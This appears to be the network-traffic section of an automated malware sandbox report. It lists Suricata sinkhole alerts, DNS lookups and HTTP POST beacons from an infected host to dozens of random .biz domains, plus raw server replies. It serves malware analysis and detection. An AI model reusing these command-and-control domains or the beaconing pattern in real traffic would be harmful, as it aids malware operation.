      Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 34.246.200.160:80 -> 192.168.2.22:49182
      Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 34.246.200.160:80 -> 192.168.2.22:49182
      Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.208.156.248:80 -> 192.168.2.22:49183
      Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.208.156.248:80 -> 192.168.2.22:49183
      Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.141.10.107:80 -> 192.168.2.22:49179
      Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.141.10.107:80 -> 192.168.2.22:49179
      Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 44.221.84.105:80 -> 192.168.2.22:49168
      Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 44.221.84.105:80 -> 192.168.2.22:49168
      Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 13.251.16.150:80 -> 192.168.2.22:49177
      Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 13.251.16.150:80 -> 192.168.2.22:49177
      Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.246.231.120:80 -> 192.168.2.22:49196
      Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.246.231.120:80 -> 192.168.2.22:49196
      Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 35.164.78.200:80 -> 192.168.2.22:49188
      Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 35.164.78.200:80 -> 192.168.2.22:49188
      Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 3.94.10.34:80 -> 192.168.2.22:49189
      Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 3.94.10.34:80 -> 192.168.2.22:49189
      Source: global trafficHTTP traffic detected: POST /qbdegkuges HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 852
      Source: global trafficHTTP traffic detected: POST /qbdegkuges HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 808
      Source: global trafficHTTP traffic detected: POST /bpewylwxymwihal HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 808
      Source: global trafficHTTP traffic detected: POST /xuofommcmtwcs HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 852
      Source: global trafficHTTP traffic detected: POST /dyk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 852
      Source: global trafficHTTP traffic detected: POST /xtaadg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 852
      Source: global trafficHTTP traffic detected: POST /nabdw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 852
      Source: global trafficHTTP traffic detected: POST /vccrolpmtjge HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 852
      Source: global trafficHTTP traffic detected: POST /ydlpotfktdldc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 852
      Source: global trafficHTTP traffic detected: POST /m HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 852
      Source: global trafficHTTP traffic detected: POST /prfudb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 852
      Source: global trafficHTTP traffic detected: POST /qmufc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 852
      Source: global trafficHTTP traffic detected: POST /webejpnbfwojkbv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 852
      Source: global trafficHTTP traffic detected: POST /p HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xlfhhhm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 852
      Source: global trafficHTTP traffic detected: POST /rkqa HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ifsaia.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 852
      Source: global trafficHTTP traffic detected: POST /ovknk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: saytjshyf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 852
      Source: global trafficHTTP traffic detected: POST /nm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vcddkls.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 852
      Source: global trafficHTTP traffic detected: POST /hwxehcd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 852
      Source: global trafficHTTP traffic detected: POST /kbtuvb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 852
      Source: global trafficHTTP traffic detected: POST /ebyryipv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tbjrpv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 852
      Source: global trafficHTTP traffic detected: POST /vhlxvyk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: deoci.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 852
      Source: global trafficHTTP traffic detected: POST /aphnqtgnwfpgg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 852
      Source: global trafficHTTP traffic detected: POST /cmjndgqt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 852
      Source: global trafficHTTP traffic detected: POST /nqtlxhjrub HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qaynky.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 852
      Source: global trafficHTTP traffic detected: POST /tgcwttfqletfhyq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bumxkqgxu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 852
      Source: global trafficHTTP traffic detected: POST /tgcwttfqletfhyq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dwrqljrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 852
      Source: global trafficHTTP traffic detected: POST /tgcwttfqletfhyq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oshhkdluh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 852
      Source: global trafficHTTP traffic detected: POST /tgcwttfqletfhyq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 852
      Source: global trafficHTTP traffic detected: POST /tgcwttfqletfhyq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 852
      Source: global trafficHTTP traffic detected: POST /tgcwttfqletfhyq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lrxdmhrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 852
      Source: global trafficHTTP traffic detected: POST /tgcwttfqletfhyq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wllvnzb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 852
      Source: global trafficHTTP traffic detected: POST /tgcwttfqletfhyq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gnqgo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 852
      Source: global trafficHTTP traffic detected: POST /tgcwttfqletfhyq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jhvzpcfg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 852
      Source: global trafficHTTP traffic detected: POST /tgcwttfqletfhyq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: acwjcqqv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 852
      Source: global trafficHTTP traffic detected: POST /tgcwttfqletfhyq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yauexmxk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 852
      Source: global trafficHTTP traffic detected: POST /tgcwttfqletfhyq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: iuzpxe.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 852
      Source: global trafficDNS traffic detected: DNS query: pywolwnvd.biz
      Source: global trafficDNS traffic detected: DNS query: ssbzmoy.biz
      Source: global trafficDNS traffic detected: DNS query: cvgrf.biz
      Source: global trafficDNS traffic detected: DNS query: npukfztj.biz
      Source: global trafficDNS traffic detected: DNS query: przvgke.biz
      Source: global trafficDNS traffic detected: DNS query: zlenh.biz
      Source: global trafficDNS traffic detected: DNS query: knjghuig.biz
      Source: global trafficDNS traffic detected: DNS query: uhxqin.biz
      Source: global trafficDNS traffic detected: DNS query: anpmnmxo.biz
      Source: global trafficDNS traffic detected: DNS query: lpuegx.biz
      Source: global trafficDNS traffic detected: DNS query: vjaxhpbji.biz
      Source: global trafficDNS traffic detected: DNS query: xlfhhhm.biz
      Source: global trafficDNS traffic detected: DNS query: ifsaia.biz
      Source: global trafficDNS traffic detected: DNS query: saytjshyf.biz
      Source: global trafficDNS traffic detected: DNS query: vcddkls.biz
      Source: global trafficDNS traffic detected: DNS query: fwiwk.biz
      Source: global trafficDNS traffic detected: DNS query: tbjrpv.biz
      Source: global trafficDNS traffic detected: DNS query: deoci.biz
      Source: global trafficDNS traffic detected: DNS query: gytujflc.biz
      Source: global trafficDNS traffic detected: DNS query: qaynky.biz
      Source: global trafficDNS traffic detected: DNS query: bumxkqgxu.biz
      Source: global trafficDNS traffic detected: DNS query: dwrqljrr.biz
      Source: global trafficDNS traffic detected: DNS query: nqwjmb.biz
      Source: global trafficDNS traffic detected: DNS query: ytctnunms.biz
      Source: global trafficDNS traffic detected: DNS query: myups.biz
      Source: global trafficDNS traffic detected: DNS query: oshhkdluh.biz
      Source: global trafficDNS traffic detected: DNS query: yunalwv.biz
      Source: global trafficDNS traffic detected: DNS query: jpskm.biz
      Source: global trafficDNS traffic detected: DNS query: lrxdmhrr.biz
      Source: global trafficDNS traffic detected: DNS query: wllvnzb.biz
      Source: global trafficDNS traffic detected: DNS query: gnqgo.biz
      Source: global trafficDNS traffic detected: DNS query: jhvzpcfg.biz
      Source: global trafficDNS traffic detected: DNS query: acwjcqqv.biz
      Source: global trafficDNS traffic detected: DNS query: lejtdj.biz
      Source: global trafficDNS traffic detected: DNS query: vyome.biz
      Source: global trafficDNS traffic detected: DNS query: yauexmxk.biz
      Source: global trafficDNS traffic detected: DNS query: iuzpxe.biz
      Source: unknownHTTP traffic detected: POST /qbdegkuges HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 852
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Thu, 28 Nov 2024 11:13:52 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Thu, 28 Nov 2024 11:13:53 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
